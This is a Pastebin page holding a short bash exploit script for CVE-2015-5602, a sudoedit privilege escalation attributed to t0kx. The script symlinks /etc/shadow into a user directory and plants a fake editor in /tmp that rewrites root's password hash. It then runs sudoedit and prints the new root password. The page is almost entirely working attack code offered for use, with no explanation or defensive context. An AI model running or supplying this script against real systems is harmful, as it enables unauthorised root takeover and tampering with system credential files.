Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env bash
- # CVE-2015-5602 exploit by t0kx
- # https://github.com/t0kx/privesc-CVE-2015-5602
- export EDITOR="/tmp/edit"
- export FOLDER="${RANDOM}"
- export PASSWD=$(printf ${RANDOM} \
- | md5sum \
- | awk '{print $1}')
- prepare() {
- cat << EOF >> /tmp/edit
- #!/usr/bin/env bash
- pass="$(printf "%q" $(openssl passwd -1 -salt ${RANDOM} ${PASSWD}))"
- sed -i -e "s,^root:[^:]\+:,root:\${pass}:," \${1}
- EOF
- }
- main() {
- printf "[+] CVE-2015-5602 exploit by t0kx\n"
- printf "[+] Creating folder...\n"
- mkdir -p /home/${USER}/${FOLDER}/
- printf "[+] Creating symlink\n"
- ln -sf /etc/shadow /home/${USER}/${FOLDER}/HackMe2.txt
- printf "[+] Modify EDITOR...\n"
- prepare && chmod +x ${EDITOR}
- printf "[+] Change root password to: ${PASSWD}\n"
- sudoedit /home/${USER}/${FOLDER}/esc.txt
- printf "[+] Done\n"
- }; main
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement